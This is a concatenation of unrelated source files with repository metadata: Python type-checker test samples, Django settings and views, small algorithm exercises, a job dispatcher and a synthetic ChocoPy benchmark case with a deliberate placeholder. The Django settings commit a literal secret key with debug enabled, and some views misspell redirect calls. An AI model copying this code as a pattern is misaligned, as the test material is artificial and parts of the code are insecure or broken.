| 2023-08-26T05:54:43.660282 | 2021-10-30T16:35:06 | 2021-10-30T16:35:06 | 422,952,836 | 0 | 0 |
NOASSERTION
| 2021-10-30T17:52:03 | 2021-10-30T17:52:02 | null |
UTF-8
|
Python
| false | false | 2,648 |
py
|
# This sample tests the handling of variadic type variables used
# within Callable types.
# pyright: reportMissingModuleSource=false
from typing import Any, Callable, Literal, Protocol, Union
from typing_extensions import TypeVarTuple, Unpack
_Xs = TypeVarTuple("_Xs")
def func1(func: Callable[[int, Unpack[_Xs]], Any]) -> Callable[[Unpack[_Xs]], int]:
...
def func2(func: Callable[[Unpack[_Xs]], int]) -> Callable[[Unpack[_Xs]], int]:
...
def callback1(a: int) -> int:
...
def callback2(a: str) -> int:
...
def callback3(a: str) -> None:
...
def callback4(a: int, b: complex, c: str) -> int:
...
def callback5(a: int, *args: Unpack[_Xs]) -> Union[Unpack[_Xs]]:
...
def callback6(a: int, *args: Any) -> int:
...
def callback7(a: int, b: str, c: str, d: str, *args: Any) -> int:
...
c1 = func1(callback1)
t_c1: Literal["() -> int"] = reveal_type(c1)
c1_1 = c1()
t_c1_1: Literal["int"] = reveal_type(c1_1)
# This should generate an error.
c2 = func1(callback2)
# This should generate an error.
c3 = func2(callback3)
c4 = func1(callback4)
t_c4: Literal["(complex, str) -> int"] = reveal_type(c4)
c4_1 = c4(3j, "hi")
t_c4_1: Literal["int"] = reveal_type(c4_1)
# This should generate an error.
c4_2 = c4(3j)
# This should generate an error.
c4_3 = c4(3j, "hi", 4)
c5 = func1(callback5)
t_c5: Literal["(*_Xs@callback5) -> int"] = reveal_type(c5)
# This should generate an error.
c6_1 = func1(callback6)
# This should generate an error.
c6_2 = func2(callback6)
# This should generate an error.
c7_1 = func1(callback7)
# This should generate an error.
c7_2 = func2(callback7)
class CallbackA(Protocol[Unpack[_Xs]]):
def __call__(self, a: int, *args: Unpack[_Xs]) -> Any:
...
def func3(func: CallbackA[Unpack[_Xs]]) -> Callable[[Unpack[_Xs]], int]:
...
d1 = func3(callback1)
t_d1: Literal["() -> int"] = reveal_type(d1)
# This should generate an error.
d2 = func3(callback2)
# This should generate an error.
d3 = func3(callback3)
d4 = func3(callback4)
t_d4: Literal["(complex, str) -> int"] = reveal_type(d4)
d4_1 = d4(3j, "hi")
t_d4_1: Literal["int"] = reveal_type(d4_1)
# This should generate an error.
d4_2 = d4(3j)
# This should generate an error.
d4_3 = d4(3j, "hi", 4)
def func4(func: Callable[[Unpack[_Xs], int], int]) -> Callable[[Unpack[_Xs]], int]:
...
def callback8(a: int, b: str, c: complex, d: int) -> int:
...
d5_1 = func4(callback1)
t_d5_1: Literal["() -> int"] = reveal_type(d5_1)
# This should generate an error.
d5_2 = func4(callback4)
d5_3 = func4(callback8)
t_d5_3: Literal["(int, str, complex) -> int"] = reveal_type(d5_3)
|
[
"[email protected]"
] | |
f8efb8796402968e0d65adeb58b5693319539a4e
|
ef60f1908dba8f3854148ad1395db43a23caa850
|
/libsystem/libsystem/wsgi.py
|
f884fcdd95b3300a8580e6a00c1f1d0ebd85e469
|
[] |
no_license
|
Richardo3/libsystem
|
797403038e23778843fc7bc4146bc37eaaa11361
|
8f025a1bfd7e902b6871cac8ccbd85503de67990
|
refs/heads/master
| 2020-05-04T19:43:50.454937 | 2019-04-05T09:11:47 | 2019-04-05T09:11:47 | 179,405,561 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 396 |
py
|
"""
WSGI config for libsystem project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "libsystem.settings")
application = get_wsgi_application()
|
[
"[email protected]"
] | |
e87040c6a1bd846558f8c253422413cbb91f6f5f
|
161daf1046832d25e66858157f95eb226ecf7cdf
|
/Linear Regression/Single Variable Linear Regression Manually.py
|
6919d3f1af1bf449d416df7b20ca966b71574d64
|
[] |
no_license
|
Dipeshpal/Machine-Learning
|
551552c0f5fc922aa6f9f5ec5d522db983ae6063
|
626516ef9f0d63a67a073eab4fc266fd6510e482
|
refs/heads/master
| 2022-07-05T22:19:38.050175 | 2019-07-10T09:05:31 | 2019-07-10T09:05:31 | 188,903,340 | 0 | 0 | null | 2022-06-21T22:05:10 | 2019-05-27T20:10:12 |
Python
|
UTF-8
|
Python
| false | false | 2,101 |
py
|
# Linear Regression
# Import Libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# load dataset
dataset = pd.read_csv('headbrain.csv')
# dropping ALL duplicate values
dataset.drop_duplicates(keep=False, inplace=True)
print("Dataset head: ", dataset.head())
print("Dataset shape: ", dataset.shape)
# Correlations Matrix (Visualize Relations between Data)
# From this we can find which param has more relations
correlations = dataset.corr()
sns.heatmap(correlations, square=True, cmap="YlGnBu")
plt.title("Correlations")
plt.show()
# Getting feature (x) and label(y)
# From correlations matrix we found Head Size(cm^3) and Brain Weight(grams) are most co-related data
x = dataset["Head Size(cm^3)"].values
y = dataset["Brain Weight(grams)"].values
# Fitting Line (Model) y = mx + c
# where, m = summation[(x-mean_x)(y-mean_y)]%summation[(x-mean_x)**2]
# c = y - mx
mean_x = np.mean(x)
mean_y = np.mean(y)
# Total number of features
l = len(x)
# numerator = summation[(x-mean_x)(y-mean_y)
# denominator = summation[(x-mean_x)**2
numerator = 0
denominator = 0
for i in range(l):
numerator += (x[i] - mean_x) * (y[i] - mean_y)
denominator += (x[i] - mean_x) ** 2
# m is gradient
m = numerator / denominator
# c is intercept
c = mean_y - (m * mean_x)
print("m: ", m)
print("c: ", c)
# for better visualization (Scaling of data) get max and min point of x
max_x = np.max(x) + 100
min_x = np.min(x) - 100
# X is data points (between max_x and min_y)
X = np.linspace(max_x, min_x, 10)
# model here (we know m and c, already calculated above on sample dataset)
Y = m*X + c
# plotting graph for model
plt.plot(X, Y, color='#58b970', label='Regression Line')
plt.scatter(x, y, c='#ef5424', label='Scatter Plot:n Given Data')
plt.legend()
plt.show()
# Calculate R Square
sst = 0
ssr = 0
for i in range(l):
y_pred = m * x[i] + c
sst += (y[i] - mean_y) ** 2
ssr += (y[i] - y_pred) ** 2
# print("Sum of Squared Total: ", sst)
# print("Sum of Squared due to Regression: ", ssr)
r2 = 1 - (ssr / sst)
print("R Squared: ", r2)
|
[
"[email protected]"
] | |
aeb178754d3e11d4c0785eac82d396cb1a9efc7e
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/prime-big-431.py
|
6dff84319c64e9671d5fbc210e23958e95c5317e
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,705 |
py
|
# Get the n-th prime starting from 2
def get_prime(n:int) -> int:
candidate:int = 2
found:int = 0
while True:
if is_prime(candidate):
found = found + 1
if found == n:
return candidate
candidate = candidate + 1
return 0 # Never happens
def is_prime(x:int) -> bool:
div:int = 2
div2:int = 2
div3:int = 2
div4:int = 2
div5:int = 2
while div < x:
if x % div == 0:
return False
div = div + 1
return True
def is_prime2(x:int, x2:int) -> bool:
div:int = 2
div2:int = 2
div3:int = 2
div4:int = 2
div5:int = 2
while div < x:
if x % div == 0:
return False
div = div + 1
return True
def is_prime3(x:int, x2:int, x3:int) -> bool:
div:int = 2
div2:int = 2
div3:int = 2
div4:int = 2
div5:int = 2
while div < x:
if x % div == 0:
return False
div = div + 1
return True
def is_prime4(x:int, x2:int, x3:int, x4:int) -> bool:
div:int = 2
$TypedVar = 2
div3:int = 2
div4:int = 2
div5:int = 2
while div < x:
if x % div == 0:
return False
div = div + 1
return True
def is_prime5(x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
div:int = 2
div2:int = 2
div3:int = 2
div4:int = 2
div5:int = 2
while div < x:
if x % div == 0:
return False
div = div + 1
return True
# Input parameter
n:int = 15
n2:int = 15
n3:int = 15
n4:int = 15
n5:int = 15
# Run [1, n]
i:int = 1
i2:int = 1
i3:int = 1
i4:int = 1
i5:int = 1
# Crunch
while i <= n:
print(get_prime(i))
i = i + 1
|
[
"[email protected]"
] | |
6cd6e5909a0368323c8af0e4fa9a44957c2f0f36
|
5636cb0c282d03e91a830d30cec3bd54c225bd3b
|
/P_05_AlgorithmiqueProgrammation/03_Tris/TD_01_Bulles/programmes/tri_bulles.py
|
3cb89b551a595d40d3e8a838803994b50a2c38c8
|
[] |
no_license
|
xpessoles/Informatique
|
24d4d05e871f0ac66b112eee6c51cfa6c78aea05
|
3cb4183647dc21e3acbcbe0231553a00e41e4e55
|
refs/heads/master
| 2023-08-30T21:10:56.788526 | 2021-01-26T20:57:51 | 2021-01-26T20:57:51 | 375,464,331 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 508 |
py
|
import random
def tri_bulles_naif(l):
for i in range(0,len(l)-1):
for j in range(0,len(l)-1):
if l[j]>l[j+1]:
l[j],l[j+1]=l[j+1],l[j]
def tri_bulles(l):
for i in range(0,len(l)-1):
for j in range(0,len(l)-i-1):
if l[j]>l[j+1]:
l[j],l[j+1]=l[j+1],l[j]
"""
l = [random.randint(0,10) for i in range(10)]
print(l)
tri_bulles_naif(l)
print(l)
"""
l = [random.randint(0,10) for i in range(10)]
print(l)
tri_bulles(l)
print(l)
|
[
"[email protected]"
] | |
1085ba45a8f735ea9ea5fa371a548f5de125ee1a
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/leap/a3b8b55879a04bce804d9c199db55772.py
|
c6ce2afde394c9c920e45ec48d6cd4dde93f53ae
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null |
UTF-8
|
Python
| false | false | 416 |
py
|
__author__ = 'Ben'
# on every year that is evenly divisible by 4
# except every year that is evenly divisible by 100
# unless the year is also evenly divisible by 400
def is_leap_year(year):
if year % 4 == 0 and year % 100 == 0 and year % 400 == 0:
return True
if year % 4 == 0 and year % 100 == 0:
return False
if year % 4 == 0:
return True
else:
return False
|
[
"[email protected]"
] | |
feaa11ac9c9654dcac5b82c4723fcf59931647f2
|
ce60f76c6ad4c48fd6182240b302ee057809cc66
|
/extra/jobqueue/dispatcher.py
|
a9f043e8fc7ee4f9dd606e8201f33c3083a2c6dd
|
[
"MIT",
"LicenseRef-scancode-public-domain"
] |
permissive
|
bumps/bumps
|
8ae10e8d15c0aa64e0bab6e00e7fabb2ca1b0860
|
2594e69567d534b434dc0eae727b77fdeff411d4
|
refs/heads/master
| 2023-08-22T17:56:49.987181 | 2023-07-26T14:22:23 | 2023-07-26T14:22:23 | 2,799,064 | 48 | 28 |
NOASSERTION
| 2023-07-26T14:22:24 | 2011-11-17T22:22:02 |
Python
|
UTF-8
|
Python
| false | false | 6,471 |
py
|
from datetime import datetime, timedelta
import logging
from sqlalchemy import and_, or_, func, select
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm.exc import NoResultFound
from . import runjob, store, db, notify
from .db import Job, ActiveJob
class Scheduler(object):
def __init__(self):
db.connect()
def jobs(self, status=None):
session = db.Session()
if status:
jobs = (session.query(Job)
.filter(Job.status==status)
.order_by(Job.priority)
)
else:
jobs = (session.query(Job)
.order_by(Job.priority)
)
return [j.id for j in jobs]
def submit(self, request, origin):
session = db.Session()
# Find number of jobs for the user in the last 30 days
n = (session.query(Job)
.filter(or_(Job.notify==request['notify'],Job.origin==origin))
.filter(Job.date >= datetime.utcnow() - timedelta(30))
.count()
)
#print "N",n
job = Job(name=request['name'],
notify=request['notify'],
origin=origin,
priority=n)
session.add(job)
session.commit()
store.create(job.id)
store.put(job.id,'request',request)
return job.id
def _getjob(self, id):
session = db.Session()
return session.query(Job).filter(Job.id==id).first()
def results(self, id):
job = self._getjob(id)
try:
return runjob.results(id)
except KeyError:
if job:
return { 'status': job.status }
else:
return { 'status': 'UNKNOWN' }
def status(self, id):
job = self._getjob(id)
return job.status if job else 'UNKNOWN'
def info(self,id):
request = store.get(id,'request')
return request
def cancel(self, id):
session = db.Session()
(session.query(Job)
.filter(Job.id==id)
.filter(Job.status.in_('ACTIVE','PENDING'))
.update({ 'status': 'CANCEL' })
)
session.commit()
def delete(self, id):
"""
Delete any external storage associated with the job id. Mark the
job as deleted.
"""
session = db.Session()
(session.query(Job)
.filter(Job.id == id)
.update({'status': 'DELETE'})
)
store.destroy(id)
def nextjob(self, queue):
"""
Make the next PENDING job active, where pending jobs are sorted
by priority. Priority is assigned on the basis of usage and the
order of submissions.
"""
session = db.Session()
# Define a query which returns the lowest job id of the pending jobs
# with the minimum priority
_priority = select([func.min(Job.priority)],
Job.status=='PENDING')
min_id = select([func.min(Job.id)],
and_(Job.priority == _priority,
Job.status == 'PENDING'))
for _ in range(10): # Repeat if conflict over next job
# Get the next job, if there is one
try:
job = session.query(Job).filter(Job.id==min_id).one()
#print job.id, job.name, job.status, job.date, job.start, job.priority
except NoResultFound:
return {'request': None}
# Mark the job as active and record it in the active queue
(session.query(Job)
.filter(Job.id == job.id)
.update({'status': 'ACTIVE',
'start': datetime.utcnow(),
}))
activejob = db.ActiveJob(jobid=job.id, queue=queue)
session.add(activejob)
# If the job was already taken, roll back and try again. The
# first process to record the job in the active list wins, and
# will change the job status from PENDING to ACTIVE. Since the
# job is no longer pending, the so this
# should not be an infinite loop. Hopefully if the process
# that is doing the transaction gets killed in the middle then
# the database will be clever enough to roll back, otherwise
# we will never get out of this loop.
try:
session.commit()
except IntegrityError:
session.rollback()
continue
break
else:
logging.critical('dispatch could not assign job %s'%job.id)
raise IOError('dispatch could not assign job %s'%job.id)
request = store.get(job.id,'request')
# No reason to include time; email or twitter does that better than
# we can without client locale information.
notify.notify(user=job.notify,
msg=job.name+" started",
level=1)
return { 'id': job.id, 'request': request }
def postjob(self, id, results):
# TODO: redundancy check, confirm queue, check sig, etc.
# Update db
session = db.Session()
(session.query(Job)
.filter(Job.id == id)
.update({'status': results.get('status','ERROR'),
'stop': datetime.utcnow(),
})
)
(session.query(ActiveJob)
.filter(ActiveJob.jobid == id)
.delete())
try:
session.commit()
except:
session.rollback()
# Save results
store.put(id,'results',results)
# Post notification
job = self._getjob(id)
if job.status == 'COMPLETE':
if 'value' in results:
status_msg = " ended with %s"%results['value']
else:
status_msg = " complete"
elif job.status == 'ERROR':
status_msg = " failed"
elif job.status == 'CANCEL':
status_msg = " cancelled"
else:
status_msg = " with status "+job.status
# Note: no reason to include time; twitter or email will give it
# Plus, doing time correctly requires knowing the locale of the
# receiving client.
notify.notify(user=job.notify,
msg=job.name+status_msg,
level=2)
|
[
"[email protected]"
] | |
eebbab8cc0fe982d9573dbef8fc19af5181a7c48
|
9b77f1e31d5901924431a2a3164312cc346bde4f
|
/ADI_MINI_PROJECT/blog/views.py
|
77aca8b4054fcba1c1dd859c800aa3a307556c0c
|
[] |
no_license
|
Adi19471/Djnago_Code-Daily
|
c2184bf21db5c8d4b3c4098fbd593e4949375ae8
|
03b1b70d3e187fe85eb24e88b7ef3391b14aa98c
|
refs/heads/master
| 2023-08-14T14:36:36.144243 | 2021-09-20T12:52:46 | 2021-09-20T12:52:46 | 375,690,484 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,673 |
py
|
from django.shortcuts import render,HttpResponseRedirect
from .forms import SignupForm,LoginForm,PostForm
from django.contrib import messages
from django.contrib.auth import authenticate,login,logout
from .models import Post
# home page
def home(request):
posts = Post.objects.all()
return render(request, 'blog/home.html',{'posts':posts})
#about page
def about(request):
return render(request, 'blog/about.html')
# contact page
def contact(request):
return render(request, 'blog/contact.html')
# dahsboard page
def dashbord(request):
if request.user.is_authenticated:
posts = Post.objects.all()
messages.info(request,'you enter DashBoard....!!!','dont you want dashboed then click okay')
return render(request, 'blog/dashbord.html',{'posts':posts})
else:
return HttpResponseRedirect('/login/')
# logout page
def user_logout(request):
logout(request)
return HttpResponseRedirect('/')
#signup page
def user_signup(request):
if request.method == "POST":
form = SignupForm(request.POST)
if form.is_valid():
messages.info(request,'Congratulation..!! You have become a Author')
form.save()
else:
form = SignupForm()
return render(request, 'blog/signup.html',{'form':form})
# login page
def user_login(request):
if not request.user.is_authenticated:
if request.method == "POST":
form = LoginForm(request=request, data=request.POST)
if form.is_valid():
uname = form.cleaned_data['username']
upass = form.cleaned_data['password']
user = authenticate(username=uname, password=upass)
if user is not None:
login(request, user)
messages.success(request, 'Logged in Successfully !!')
return HttpResponseRedirect('/dashbord/')
else:
form = LoginForm()
return render(request, 'blog/login.html', {'form':form})
else:
return HttpResponseRedirect('/dashbord/')
# add new post
def add_post(request):
if request.user.is_authenticated:
if request.method =='POST':
form = PostForm(request.POST)
if form.is_valid():
ti = form.cleaned_data['title']
de = form.cleaned_data['desc']
dt = form.cleaned_data['date_time']
user = Post(title=ti,desc=de,date_time=dt)
user.save()
messages.warning(request,'you go to dashboard MENU okay....?')
form = PostForm()
else:
form = PostForm()
return render(request,'blog/addpost.html',{'form':form})
else:
return HttpresponseRedirect('/login/')
# update post
def update_post(request,id):
if request.user.is_authenticated:
if request.method == 'POST':
pi = Post.objects.get(pk=id)
form = PostForm(request.POST,instance=pi)
if form.is_valid():
form.save()
else:
pi = Post.objects.get(pk=id)
form = PostForm(instance=pi)
return render(request,'blog/update.html',{'form':form})
else:
return HttpresponseRedirect('/login/')
# delete post
# def delete_post(request,id):
# if request.user.is_authenticated:
# if request.method == 'POST':
# pi = Post.objects.get(pk = id)
# pi.delete()
# return HttpresponseRedirect('/dashbord/'
# else:
# return HttpresponseRedirect('/login/')
def delete_post(request, id):
if request.user.is_authenticated:
if request.method == 'POST':
pi = Post.objects.get(pk = id)
pi.delete()
return HttpResponseRedirect('/dashbord/')
else:
return HttpResponseRedirect('/login/')
|
[
"[email protected]"
] | |
35a9a876dc10d8de63623e6d3d37890bb3842900
|
bea3febeda4c0688dfbb2db584ab4f7d710040e0
|
/django/cbv/person/views.py
|
c954514b57714390b9b1210f810dd5c51ab31499
|
[] |
no_license
|
airpong/TIL-c9
|
c471ac73e23716cf677ba590dd6099e584c42883
|
069cc53820a09cd9787765ad41ba7e792dc342b5
|
refs/heads/master
| 2022-12-12T22:26:23.147651 | 2019-06-27T08:24:44 | 2019-06-27T08:24:44 | 166,777,129 | 0 | 0 | null | 2022-11-22T03:46:57 | 2019-01-21T08:34:01 |
Python
|
UTF-8
|
Python
| false | false | 999 |
py
|
from django.shortcuts import render,redirect
from .models import Person
from .forms import PersonForm
from django.views.generic import ListView,CreateView
from django.contrib.auth.mixins import LoginRequiredMixin
# Create your views here.
# def list(request):
# people = Person.objects.all()
# return render(request,'person/person_list.html',{'people':people})
class PersonList(ListView):
model = Person
context_object_name = 'people'
# def create(request):
# if request.method == 'GET':
# form = PersonForm()
# return render(request,'person/person_form.html',{'form':form})
# else:
# last_name = request.POST.get('last_name')
# email = request.POST.get('email')
# age = request.POST.get('age')
# Person.objects.create(last_name=last_name,email=email,age=age)
# return redirect('list')
class PersonCreate(LoginRequiredMixin,CreateView):
model = Person
form_class = PersonForm
success_url = '/person/'
|
[
"[email protected]"
] | |
18f7fd778281764630b6d87c06f297330644c9a1
|
7bededcada9271d92f34da6dae7088f3faf61c02
|
/pypureclient/flasharray/FA_2_17/models/reference_with_type.py
|
686da10b71d57d6ece1d116f5a7668ce8c35aa23
|
[
"BSD-2-Clause"
] |
permissive
|
PureStorage-OpenConnect/py-pure-client
|
a5348c6a153f8c809d6e3cf734d95d6946c5f659
|
7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e
|
refs/heads/master
| 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 |
BSD-2-Clause
| 2023-09-08T09:08:30 | 2018-12-04T17:02:51 |
Python
|
UTF-8
|
Python
| false | false | 4,557 |
py
|
# coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.17
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_17 import models
class ReferenceWithType(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'resource_type': 'str'
}
attribute_map = {
'id': 'id',
'name': 'name',
'resource_type': 'resource_type'
}
required_args = {
}
def __init__(
self,
id=None, # type: str
name=None, # type: str
resource_type=None, # type: str
):
"""
Keyword args:
id (str): A globally unique, system-generated ID. The ID cannot be modified.
name (str): The resource name, such as volume name, pod name, snapshot name, and so on.
resource_type (str): Type of the object (full name of the endpoint). Valid values are `hosts`, `host-groups`, `network-interfaces`, `pods`, `ports`, `pod-replica-links`, `subnets`, `volumes`, `volume-snapshots`, `volume-groups`, `directories`, `policies/nfs`, `policies/smb`, and `policies/snapshot`, etc.
"""
if id is not None:
self.id = id
if name is not None:
self.name = name
if resource_type is not None:
self.resource_type = resource_type
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ReferenceWithType`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def __getitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ReferenceWithType`".format(key))
return object.__getattribute__(self, key)
def __setitem__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ReferenceWithType`".format(key))
object.__setattr__(self, key, value)
def __delitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ReferenceWithType`".format(key))
object.__delattr__(self, key)
def keys(self):
return self.attribute_map.keys()
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ReferenceWithType, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ReferenceWithType):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"[email protected]"
] | |
0f7ec680721030d047f06b1b94341a7c982454b5
|
402ef712e2d98bb616e64eb7d57145a643ad61d7
|
/backend/mobile_testing_app__15569/wsgi.py
|
7832e8909382ddeb029a4fbf984861ab927942fb
|
[] |
no_license
|
crowdbotics-apps/mobile-testing-app--15569
|
ce5299c1dc7b5ebf531043dbe7614c7206880ce0
|
5c6e5f045a9ba80592e81584ac7c88ea53eabdfa
|
refs/heads/master
| 2023-01-24T21:54:07.548231 | 2020-11-24T06:01:05 | 2020-11-24T06:01:05 | 315,533,722 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 427 |
py
|
"""
WSGI config for mobile_testing_app__15569 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mobile_testing_app__15569.settings')
application = get_wsgi_application()
|
[
"[email protected]"
] | |
235f40b873b377065055784a18c708cd33c11a20
|
dbdb9b2102b25808f0363d50ff85626921b1c70a
|
/rest_api_3_product/settings.py
|
baee96ac579b1af253e75334bad35faaa15bf71c
|
[] |
no_license
|
vinodkumar96/rest_api_3_product
|
dee834e704c25c812ba94a682641ab7f9bcabd44
|
b0be03b80d7b59ef4d81e02f977c5ed1df862709
|
refs/heads/master
| 2020-07-04T20:38:15.552542 | 2019-08-14T19:08:09 | 2019-08-14T19:08:09 | 202,409,475 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,242 |
py
|
"""
Django settings for rest_api_3_product project.
Generated by 'django-admin startproject' using Django 2.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'd56v)@7t(80-417mdh)+3++!d5hd($la5m$w*b4xum9vjfnx)u'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Rapp_3_ModelClass.apps.Rapp3ModelclassConfig',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'rest_api_3_product.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'rest_api_3_product.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
|
[
"[email protected]"
] | |
b03de72493e2c78c1000ad28f82b270dba2b5ebb
|
f13acd0d707ea9ab0d2f2f010717b35adcee142f
|
/Others/soundhound/soundhound2018-summer-qual/c.py
|
b42363ae9f79c07d25224a6872610f1bc11e50c0
|
[
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] |
permissive
|
KATO-Hiro/AtCoder
|
126b9fe89fa3a7cffcbd1c29d42394e7d02fa7c7
|
bf43320bc1af606bfbd23c610b3432cddd1806b9
|
refs/heads/master
| 2023-08-18T20:06:42.876863 | 2023-08-17T23:45:21 | 2023-08-17T23:45:21 | 121,067,516 | 4 | 0 |
CC0-1.0
| 2023-09-14T21:59:38 | 2018-02-11T00:32:45 |
Python
|
UTF-8
|
Python
| false | false | 797 |
py
|
# -*- coding: utf-8 -*-
def main():
n, m, d = map(int, input().split())
# KeyInsight
# ๆๅพ
ๅคใฎ็ทๅฝขๆง
# See:
# https://img.atcoder.jp/soundhound2018-summer-qual/editorial.pdf
# https://mathtrain.jp/expectation
# ๆฐใใคใใ็น
# ๆ็ด่งฃใๆธใๅบใใ
# ้ฃใๅใ2้
ใm - 1้ใใใ
# ่งฃ็ญใพใงใฎใฎใฃใใ
# dใ0ใใฉใใใงๅ ดๅๅใ
# ๆดๆฐใฎใใขใ่ใใ
ans = m - 1
if d == 0:
# d = 0: (1, 1), ..., (n, n)ใฎn้ใ
ans /= n
else:
# d โ 0: (1, d + 1), ..., (n -d, n)ใจ(d - 1, 1), ..., (n, n - d)ใง2 * (n - d)้ใ
ans *= 2 * (n - d)
ans /= n ** 2
print(ans)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
579b09ba8c6ea43f5b254fc7bfcff355538a029b
|
aa369073fab4f8e13ac27a714fe0d975a5a4a9ed
|
/algorithms/contextlib/contextlib_decorator.py
|
e31081404750566ee6b97aecadeb90d4fa43ebe0
|
[] |
no_license
|
ramsayleung/python3-module-of-week
|
4076599a8b1d8aa5794de5d73e2083555abe9f0c
|
54266c7e62025c3816a6987191c40f3bc0fdd97c
|
